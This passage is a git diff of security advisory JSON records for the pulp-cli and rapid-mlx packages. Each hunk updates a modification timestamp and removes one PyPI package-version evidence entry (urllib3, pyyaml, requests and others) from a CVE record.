"BREW-pulp-cli-CVE-2019-11236", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2019-11324.json b/advisories/BREW-pulp-cli-CVE-2019-11324.json index e39640f74ae..629bfe1b05b 100644 --- a/advisories/BREW-pulp-cli-CVE-2019-11324.json +++ b/advisories/BREW-pulp-cli-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2019-11324", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2019-20477.json b/advisories/BREW-pulp-cli-CVE-2019-20477.json index 39ab4daa053..ec7765a8521 100644 --- a/advisories/BREW-pulp-cli-CVE-2019-20477.json +++ b/advisories/BREW-pulp-cli-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2019-20477", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-14343.json b/advisories/BREW-pulp-cli-CVE-2020-14343.json index 52c30c5fc4a..bb87a085f8f 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-14343.json +++ b/advisories/BREW-pulp-cli-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-14343", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-1747.json b/advisories/BREW-pulp-cli-CVE-2020-1747.json index f6f9921a089..86935d9b497 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-1747.json +++ b/advisories/BREW-pulp-cli-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-1747", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-26137.json b/advisories/BREW-pulp-cli-CVE-2020-26137.json index 44e114199b1..0ed3096fc43 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-26137.json +++ b/advisories/BREW-pulp-cli-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-26137", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2020-7212.json b/advisories/BREW-pulp-cli-CVE-2020-7212.json index 011acc587af..10206a2dabb 100644 --- a/advisories/BREW-pulp-cli-CVE-2020-7212.json +++ b/advisories/BREW-pulp-cli-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2020-7212", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2021-28363.json b/advisories/BREW-pulp-cli-CVE-2021-28363.json index 5ddb6f52eda..ee2f511d791 100644 --- a/advisories/BREW-pulp-cli-CVE-2021-28363.json +++ b/advisories/BREW-pulp-cli-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2021-28363", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2021-33503.json b/advisories/BREW-pulp-cli-CVE-2021-33503.json index 0ed9864bb1a..90adfdf610d 100644 --- a/advisories/BREW-pulp-cli-CVE-2021-33503.json +++ b/advisories/BREW-pulp-cli-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2021-33503", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2023-32681.json b/advisories/BREW-pulp-cli-CVE-2023-32681.json index 946d1f22869..bf10366b25f 100644 --- a/advisories/BREW-pulp-cli-CVE-2023-32681.json +++ b/advisories/BREW-pulp-cli-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2023-32681", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2023-43804.json b/advisories/BREW-pulp-cli-CVE-2023-43804.json index 5dbc16be473..9c94f4ab5e5 100644 --- a/advisories/BREW-pulp-cli-CVE-2023-43804.json +++ b/advisories/BREW-pulp-cli-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2023-43804", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2023-45803.json b/advisories/BREW-pulp-cli-CVE-2023-45803.json index 9ce50c1bc27..5ed53dd32d5 100644 --- a/advisories/BREW-pulp-cli-CVE-2023-45803.json +++ b/advisories/BREW-pulp-cli-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2023-45803", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-35195.json b/advisories/BREW-pulp-cli-CVE-2024-35195.json index 3e1077ef2f1..c16330b9389 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-35195.json +++ b/advisories/BREW-pulp-cli-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-35195", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-3651.json b/advisories/BREW-pulp-cli-CVE-2024-3651.json index 69cba241d31..2fc43e6f9da 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-3651.json +++ b/advisories/BREW-pulp-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-3651", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-23T21:21:29Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-37891.json b/advisories/BREW-pulp-cli-CVE-2024-37891.json index 18c51df5778..90e2cd92768 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-37891.json +++ b/advisories/BREW-pulp-cli-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-37891", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2024-47081.json b/advisories/BREW-pulp-cli-CVE-2024-47081.json index a6499ed4344..6f4aed06c53 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-47081.json +++ b/advisories/BREW-pulp-cli-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-47081", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-50181.json b/advisories/BREW-pulp-cli-CVE-2025-50181.json index 2b31eacfb81..b811baae5e6 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-50181.json +++ b/advisories/BREW-pulp-cli-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-50181", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-50182.json b/advisories/BREW-pulp-cli-CVE-2025-50182.json index 1b07a359fc0..ac7bbe4d377 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-50182.json +++ b/advisories/BREW-pulp-cli-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-50182", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-66418.json b/advisories/BREW-pulp-cli-CVE-2025-66418.json index ac77c33c44e..b87e76784f4 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-66418.json +++ b/advisories/BREW-pulp-cli-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-66418", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2025-66471.json b/advisories/BREW-pulp-cli-CVE-2025-66471.json index be3229268c3..1d4de7461d6 100644 --- a/advisories/BREW-pulp-cli-CVE-2025-66471.json +++ b/advisories/BREW-pulp-cli-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2025-66471", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-21441.json b/advisories/BREW-pulp-cli-CVE-2026-21441.json index fe974d18618..1431eb81421 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-21441.json +++ b/advisories/BREW-pulp-cli-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-21441", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-25645.json b/advisories/BREW-pulp-cli-CVE-2026-25645.json index 16ae2095876..d4767275314 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-25645.json +++ b/advisories/BREW-pulp-cli-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-25645", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.1", - "key": "pkg:pypi/requests@2.33.1", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-44431.json b/advisories/BREW-pulp-cli-CVE-2026-44431.json index 3974fbd37a3..423bc8e9bf4 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-44431.json +++ b/advisories/BREW-pulp-cli-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-44431", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-44432.json b/advisories/BREW-pulp-cli-CVE-2026-44432.json index c82567cd1e6..4183bb0cd51 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-44432.json +++ b/advisories/BREW-pulp-cli-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-44432", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pulp-cli-CVE-2026-45409.json b/advisories/BREW-pulp-cli-CVE-2026-45409.json index e4ebc89e152..c18270aebd4 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-45409.json +++ b/advisories/BREW-pulp-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-45409", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-23T21:21:29Z", + "modified": "2026-09-10T20:31:30Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-0012.json b/advisories/BREW-rapid-mlx-CVE-2014-0012.json index 40784b615da..670978d8e60 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-0012.json +++ b/advisories/BREW-rapid-mlx-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-0012", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-1402.json b/advisories/BREW-rapid-mlx-CVE-2014-1402.json index 82f55412c07..2d3af776f1e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-1402.json +++ b/advisories/BREW-rapid-mlx-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-1402", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-1829.json b/advisories/BREW-rapid-mlx-CVE-2014-1829.json index 1b79642b2df..a47af64bbcf 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-1829.json +++ b/advisories/BREW-rapid-mlx-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-1829", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-1830.json b/advisories/BREW-rapid-mlx-CVE-2014-1830.json index 0b19097141b..de6f764ee9c 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-1830.json +++ b/advisories/BREW-rapid-mlx-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-1830", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2015-2296.json b/advisories/BREW-rapid-mlx-CVE-2015-2296.json index d7a9740bf7d..1467bfe5a2b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2015-2296.json +++ b/advisories/BREW-rapid-mlx-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2015-2296", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2015-5237.json b/advisories/BREW-rapid-mlx-CVE-2015-5237.json index d36aa9ce7cc..81f7a9366ec 100644 --- a/advisories/BREW-rapid-mlx-CVE-2015-5237.json +++ b/advisories/BREW-rapid-mlx-CVE-2015-5237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2015-5237", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jwvw-v7c5-m82h", "CVE-2015-5237", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2015-8557.json b/advisories/BREW-rapid-mlx-CVE-2015-8557.json index 5ec435decac..bafcbf35e4a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2015-8557.json +++ b/advisories/BREW-rapid-mlx-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2015-8557", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2016-10075.json b/advisories/BREW-rapid-mlx-CVE-2016-10075.json index d725915d93f..4d6b8d9f3a9 100644 --- a/advisories/BREW-rapid-mlx-CVE-2016-10075.json +++ b/advisories/BREW-rapid-mlx-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2016-10075", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2016-10745.json b/advisories/BREW-rapid-mlx-CVE-2016-10745.json index 6ef449a5de0..9f9d935c005 100644 --- a/advisories/BREW-rapid-mlx-CVE-2016-10745.json +++ b/advisories/BREW-rapid-mlx-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2016-10745", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": 